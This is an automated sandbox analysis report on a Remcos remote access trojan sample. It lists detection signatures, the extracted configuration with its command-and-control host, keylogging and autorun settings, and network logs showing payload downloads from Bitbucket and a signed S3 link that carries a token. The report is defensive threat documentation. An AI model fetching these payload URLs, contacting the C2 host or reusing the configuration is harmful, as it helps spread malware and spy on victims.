Windows Analysis Report
4JwhvqLe8n.exe

Overview

General Information

Sample name: 4JwhvqLe8n.exe (renamed because original name is a hash value)
Original sample name: 66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9.exe
Analysis ID: 1573906
MD5: b58e300ca8077adc4094e9044bcdbbc8
SHA1: abc3b46626e17e22b744b9fe44833919255121ce
SHA256: 66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9
Tags: 181-131-217-244, exe, user-JAMESWT_MHT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates multiple autostart registry keys
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 4JwhvqLe8n.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\4JwhvqLe8n.exe" MD5: B58E300CA8077ADC4094E9044BCDBBC8)
    • csc.exe (PID: 1372 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • ccrdlld.exe (PID: 4288 cmdline: C:\Users\user\AppData\Local\Temp\ccrdlld.exe MD5: 27650AFE28BA588C759ADE95BF403833)
    • ccrdlld.exe (PID: 7120 cmdline: "C:\Users\user\AppData\Local\Temp\ccrdlld.exe" MD5: 27650AFE28BA588C759ADE95BF403833)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["newstaticfreepoint24.ddns-ip.net:1842:0"], "Assigned name": "FUTURAMA", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jdjgkdgjgkjhh-8DHJNN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "fdgfghgfhg", "Keylog file max size": ""}
Source | Rule | Description | Author
00000005.00000000.2580957765.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000003.00000002.4046933344.0000000007EC2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author
3.2.csc.exe.7f46ca8.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
3.2.csc.exe.94d0000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
3.2.csc.exe.9410000.5.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
5.2.ccrdlld.exe.11bb0000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
5.2.ccrdlld.exe.11bb0000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

                      System Summary

                      Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4JwhvqLe8n.exe, ProcessId: 5040, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OrionLegacyCLI
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-12-12T18:02:36.897207+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49843 | 181.131.217.244 | 1842 | TCP
                      2024-12-12T18:02:38.178693+0100 | 2032777 | 1 | Malware Command and Control Activity Detected | 181.131.217.244 | 1842 | 192.168.2.5 | 49843 | TCP
                      2024-12-12T18:02:40.788175+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49850 | 178.237.33.50 | 80 | TCP

                      AV Detection

                      Source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["newstaticfreepoint24.ddns-ip.net:1842:0"], "Assigned name": "FUTURAMA", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jdjgkdgjgkjhh-8DHJNN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "fdgfghgfhg", "Keylog file max size": ""}
                      Source: 4JwhvqLe8n.exe | ReversingLabs: Detection: 42%
                      Source: Yara match | File source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: ccrdlld.exe PID: 7120, type: MEMORYSTR
                      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
                      Source: ccrdlld.exe, 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                      Exploits

                      Source: Yara match | File source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: 4JwhvqLe8n.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49750 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 3.5.24.44:443 -> 192.168.2.5:49760 version: TLS 1.2
                      Source: 4JwhvqLe8n.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\samcnary\Desktop\legacyPM\core\CoreService\runtime\OriginLegacyCLI.pdb source: 4JwhvqLe8n.exe, OrionLegacyCLI.exe.0.dr
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.4046933344.0000000007D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046933344.0000000007D9D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4048264340.0000000009C40000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4047366440.0000000009410000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.4046933344.0000000007D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046933344.0000000007D9D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4048264340.0000000009C40000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4047366440.0000000009410000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32

                      Networking

                      Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49843 -> 181.131.217.244:1842
                      Source: Network traffic | Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:1842 -> 192.168.2.5:49843
                      Source: Malware configuration extractor | URLs: newstaticfreepoint24.ddns-ip.net
                      Source: global traffic | TCP traffic: 192.168.2.5:49743 -> 181.131.217.244:30203
                      Source: global traffic | HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGB46CDIP&Signature=OsUnoSTQrRgZD6FYZJqgppUhBLs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIQC1qssmaZMu0Kq%2F5UE7VMx074oM1d%2BXj1uJ%2B9uNqpoePQIgFeE4zY04aoLCi5xHmh1Tg9HBeMUGDXUCT9cKr%2FT49vsqsAIIwv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDL4p3i3uRNNKPKBtsiqEAmWSN4qXnlEPekaIRewDbxqmzd738FbMSYF6yOejRX7UjKy58YjDJFsXH4LoiMqySTikefatHXwx8UawuXSw40xhPCSf6ZNVVhxIs6%2B98cEmwIvmpRC%2FOdW4sDY4BxSBIF%2F2NDDOh7bpfb7NAWS%2B9VcOTbH6Q5Odca1yZcK4sIsx90QntabTAavZ5qDYhdxdDEHOXtZ1I67Kh3cnKHUnUsfzGqjAWfoXFAT%2B6VxUzAueumFQfzwfbjwOus4ML23IBZ%2F8pc8JVhhIpJZjV04Xv2X%2BZ%2BDSSf4IIoyBBrjX%2Fp23vP%2B%2FAEHvBknm1v51J7irQC8H%2FqOcUfKjIseMSrem7rdR3R7tML2q7LoGOp0Be%2BbdUZ1VS1k%2BpYMTJXZ%2F0oOTjr23Th9wKEZGAxpdrR2zB1mn2dI1EsUc4DFBYgtG7bhYUMbmqOm68u4XRTBt5CkqTMOhF2vlWfjFIst%2FFcuh79oP5sOZM%2Bc28pWjSzS5Sb%2FRPafPW2EkEoPjN8t6s7G60X3gGdNv5GCfg%2Fy0pEaQIfUP%2B0COHPB2ZtejxGzevcprVlI4MAXc9bO%2BsQ%3D%3D&Expires=1734024261 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                      Source: Joe Sandbox View | IP Address: 181.131.217.244
                      Source: Joe Sandbox View | IP Address: 185.166.143.49
                      Source: Joe Sandbox View | IP Address: 178.237.33.50
                      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49850 -> 178.237.33.50:80
                      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic | DNS traffic detected: DNS query: navegacionseguracol24vip.org
                      Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
                      Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global traffic | DNS traffic detected: DNS query: newstaticfreepoint24.ddns-ip.net
                      Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009AA4000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: ccrdlld.exe, 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpO
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpWJ
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpapJ
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpdJ
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/son.gp5BCA4A7416B
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpnJ
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009AA4000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/lrpc:
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: csc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drString found in binary or memory: http://www.hdsentinel.com
                      Source: csc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drString found in binary or memory: http://www.hdsentinel.com/sendreport.phpU
                      Source: csc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drString found in binary or memory: http://www.hdsentinel.comU
                      Source: ccrdlld.exe.3.drString found in binary or memory: http://www.indyproject.org/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006E4B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.5.24.44:443 -> 192.168.2.5:49760 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR

                      E-Banking Fraud

                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
